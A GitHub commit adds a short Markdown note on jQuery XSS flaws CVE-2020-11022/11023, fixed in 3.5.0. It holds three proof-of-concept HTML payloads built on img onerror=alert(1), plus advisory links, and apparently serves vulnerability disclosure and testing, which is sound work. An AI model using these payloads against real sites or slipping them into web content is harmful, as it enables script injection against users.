Add files via upload

ba1ma0 · Jan 15, 2021 · 4cbfec9 · 4cbfec9
1 parent 96388aa
commit 4cbfec9
Showing 1 changed file with 25 additions and 0 deletions.
diff --git a/jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md b/jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022-CVE-2020-11023).md
@@ -0,0 +1,25 @@
+# jQuery >=1.0.3 <3.5.0 XSS (CVE-2020-11022/CVE-2020-11023)
+
+此漏洞已在jQuery 3.5.0中修复。
+
+PoC：
+
+```
+PoC 1.
+<style><style /><img src=x onerror=alert(1)> 
+PoC 2. (Only jQuery 3.x affected)
+<img alt="<x" title="/><img src=x onerror=alert(1)>">
+PoC 3.
+<option><style></option></select><img src=x onerror=alert(1)></style>
+```
+
+jQuery XSS Examples：
+
+https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html
+
+ref：
+
+* https://snyk.io/vuln/SNYK-JS-JQUERY-565129
+* https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77
+* https://mksben.l0.cm/2020/05/jquery3.5.0-xss.html
+* https://forum.ywhack.com/thread-114981-1-1.html